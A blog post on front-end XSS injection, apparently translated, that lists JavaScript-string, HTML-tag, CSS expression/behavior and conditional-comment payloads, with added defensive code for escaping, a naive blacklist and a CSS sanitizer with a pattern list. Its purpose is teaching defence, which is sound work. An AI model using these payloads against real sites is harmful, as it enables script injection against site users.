Gracecode.com
A common security problem in front-end development is exposure to XSS (cross-site scripting) injection attacks. The common code injection methods are listed here.
JavaScript code injection
JavaScript code injection happens when unvalidated strings are written directly into script, or when untrusted JSON data (including JSONP responses) is parsed by evaluating it as code.
Code like this is written all the time:

    document.write("The user name is " + name);

If the server side does not filter name, this is a security problem. For example, if name carries data such as

    ";alert(xss);//
    ';alert(xss);//
    ';!--"<xss>=&{()}

the original code structure is broken and unexpected code is inserted.
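As an added example (not code from the original post), the following shows the document.write pattern above breaking when the server concatenates an unvalidated value into script text, beside one safe way to embed the value. The payload, the stub document and alert objects, and the function names are constructions of this example.

```javascript
// Added example, not from the original post. It shows the document.write
// pattern above breaking when the server concatenates an unvalidated value
// into script text, and one safe way to embed the value instead.

// Vulnerable: `name` is pasted straight into the script. The server trusts
// it to stay inside the quotes.
function unsafeScript(name) {
  return 'document.write("The user name is ' + name + '");';
}

// Safe: encode the value as a JavaScript string literal. JSON.stringify
// escapes quotes and backslashes; the extra replacements cover what JSON
// leaves alone but a browser still acts on: '<' and '>' (so "</script>"
// cannot end the script element) and U+2028/U+2029 (line terminators in
// older engines). On the receiving side, parse data with JSON.parse, never eval.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function safeScript(name) {
  return 'document.write("The user name is " + ' + jsStringLiteral(name) + ');';
}

// Run generated script text with stub `document` and `alert` objects and
// record what it did. The stubs stand in for the browser so the example
// runs offline; a real page would of course have the real objects.
function runScript(scriptText) {
  const written = [];
  const alerts = [];
  const fakeDocument = { write: (s) => written.push(s) };
  new Function('document', 'alert', scriptText)(fakeDocument, (m) => alerts.push(m));
  return { written, alerts };
}

// Constructed payload in the style of the post's examples: close the string
// and the call, run our own statement, then comment out the rest of the line.
const PAYLOAD = '");alert("xss");//';

function demo() {
  return {
    unsafe: runScript(unsafeScript(PAYLOAD)),
    safe: runScript(safeScript(PAYLOAD)),
  };
}
```

With the unsafe template the payload's alert runs and only the prefix is written; with the safe template nothing but document.write runs and the whole payload is written out as text.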
HTML Tag Injection
HTML injection is a common method. The main entry points are incomplete regular-expression filtering and inline styles (on Internet Explorer). Common injection payloads are listed below.
The fix is to escape output with PHP's htmlspecialchars, htmlentities, or similar functions.

    <SCrIpT src=xss.js></sCrIpT>
    <script src=xss.js></script>
    <script/xss src="xss.js"></script>
    <script/src="xss.js"></script>
    <script>alert("xss");//</script>
    <script>a=/xss/
    alert(a.source)</script>

Injection from image tags, which is common on some forums:

    <script>alert("xss")</script>">

Injection from link tags (I have not found any real cases, but they should not be underestimated):

    <script a=">" src="xss.js"></script>
    <script =">" src="xss.js"></script>
    <script a=">" src="xss.js"></script>

Other places that are easy to inject:

    <body onload=alert(xss)>
    <iframe src="javascript:alert(xss);"></iframe>
    <embed src="xss.swf" AllowScriptAccess="always"></embed>
    <meta http-equiv="Set-Cookie" content="USERID=<script>alert(xss)</script>">

There are many more examples; these are just a first excerpt. The following part covers CSS injection, other injection methods, and general countermeasures. Discussion and corrections are welcome.
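As an added example (not code from the original post), the following puts the kind of incomplete regular-expression blacklist the post warns about beside output escaping, the JavaScript counterpart of PHP's htmlspecialchars, and runs both over payloads copied from the list above. The filter, the tag-detection helper, and the function names are constructions of this example.

```javascript
// Added example, not from the original post: a regex blacklist of the kind
// the post warns about, beside the escaping it recommends.

// Blacklist filter: strips a literal <script> / </script> pair and nothing
// else. This is the "incomplete regular expression" entry point.
function naiveFilter(input) {
  return String(input).replace(/<\/?script>/gi, '');
}

// Output encoding, equivalent to PHP htmlspecialchars($s, ENT_QUOTES): every
// character that can open or close HTML syntax becomes an entity, so the
// browser never sees a tag boundary no matter what the input looks like.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// Payloads taken from the post's list (plain strings; no DOM, no network).
const payloads = [
  '<SCrIpT src=xss.js></sCrIpT>',
  '<script/xss src="xss.js"></script>',
  '<script>alert("xss");//</script>',
  '<script a=">" src="xss.js"></script>',
  '<body onload=alert(xss)>',
  '<iframe src="javascript:alert(xss);"></iframe>',
];

// Crude check used only to compare the two approaches: a '<' followed by a
// letter is the start of a tag the browser would parse.
function containsTag(html) {
  return /<[a-z]/i.test(html);
}

// How many of the payloads still carry a tag after passing through `filter`.
function countTagsSurviving(filter) {
  return payloads.filter((p) => containsTag(filter(p))).length;
}
```

Only the one payload that uses a bare <script> tag is neutralised by the blacklist; case changes, attributes and the other elements all pass through, while escaping leaves no tag at all.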
Next, the CSS injection methods. CSS injection mainly means background-image injection and, on Internet Explorer, CSS expression injection.
If the style attribute is not filtered completely, code like the following becomes attack code.

    <xss style="behavior:url(xss.htc);">

The above is an .htc injection for Internet Explorer; an .htc (HTML Component) file is effectively a script.

    <div style="background-image:url(xss.jpg)">

Who knows what xss.jpg really is? Many website statistics (tracking) scripts use exactly this principle.

    <div style="width:expression(alert(xss));">
    exp/*<A style='noxss:noxss("*//*");xss:ex/*xss*//*/*/pression(alert("xss"))'>

Internet Explorer's expression() must be handled with great care; the best approach is to filter out the style attribute entirely.
If comments are not filtered completely, a typical injection hole appears on Internet Explorer through conditional comments:

    <!--[if gte IE 4]>
    <script>alert(xss);</script>
    <![endif]-->

In this case I would like to thank Internet Explorer for providing so many "opportunities".
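As an added example (not code from the original post), the following is a check for the style-attribute tricks listed above: the behavior: .htc trick, background-image fetches, and the expression() payload hidden behind CSS comments. The comment stripper is written as a small tokenizer rather than a regex because the obfuscated payload places a "/*" inside a quoted string, which a plain regex would treat as the start of a comment. The function names, the list of constructs it rejects, and the decision to drop the whole attribute when anything matches (the post's own advice) are assumptions of this example.

```javascript
// Added example, not from the original post: a check for the style-attribute
// tricks listed above. Returning null means "drop the attribute".

// Remove CSS comments without touching the contents of quoted strings. A
// plain regex such as /\/\*[\s\S]*?\*\//g would start a comment at the "/*"
// hidden inside noxss("*//*") and never reassemble "expression"; comments
// must be removed the way a CSS tokenizer sees them.
function stripCssComments(css) {
  let out = '';
  let quote = null; // active string delimiter, or null outside a string
  for (let i = 0; i < css.length; i++) {
    const c = css[i];
    if (quote !== null) {
      out += c;
      if (c === '\\' && i + 1 < css.length) out += css[++i]; // keep escaped char
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'") {
      quote = c;
      out += c;
    } else if (c === '/' && css[i + 1] === '*') {
      const end = css.indexOf('*/', i + 2);
      if (end === -1) break; // unterminated comment runs to end of input
      i = end + 1;
    } else {
      out += c;
    }
  }
  return out;
}

// Normalise so the blacklist below sees what the browser sees: comments
// removed, backslash escapes decoded (\65 is 'e'), whitespace and NULs
// dropped, everything lowercased.
function normalizeCss(value) {
  return stripCssComments(String(value))
    .replace(/\\([0-9a-f]{1,6})\s?/gi, (_, hex) => {
      const cp = parseInt(hex, 16);
      return cp === 0 || cp > 0x10ffff ? '\ufffd' : String.fromCodePoint(cp);
    })
    .replace(/\\(.)/g, '$1')
    .replace(/[\s\0]+/g, '')
    .toLowerCase();
}

// Constructs that must never survive in a user-supplied style. The first
// three come from the post; the rest are this example's additions.
const DANGEROUS_CSS = [
  /expression\(/, // IE: width: expression(alert(xss))
  /behavior:/,    // IE: behavior: url(xss.htc)
  /url\(/,        // any external fetch, e.g. background-image: url(xss.jpg)
  /javascript:/,
  /@import/,
  /-moz-binding/, // old Firefox XBL, same idea as .htc
];

// Returns the original value if it is clean, or null if the attribute
// should be dropped.
function sanitizeStyleAttribute(value) {
  const normalized = normalizeCss(value);
  return DANGEROUS_CSS.some((re) => re.test(normalized)) ? null : value;
}
```

Because the check runs on the normalised text, the comment-split "ex/*xss*//*/*/pression" and the escape-split "\65xpression" are both caught, while an ordinary "color: red; width: 100px" passes through unchanged.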
-- Split --
So how do we prevent XSS injection? User data still has to be filtered thoroughly. A far from complete list of tips:
Assume that all user input is "evil".
In a weakly typed scripting language, make sure every value is of the type you expect.
Write regular expressions with care.
strip_tags, htmlspecialchars and similar functions are very useful.
External JavaScript is not necessarily trustworthy.
Pay special attention to filtering quotation marks.
Remove unnecessary HTML comments.
Internet Explorer, please give me a break......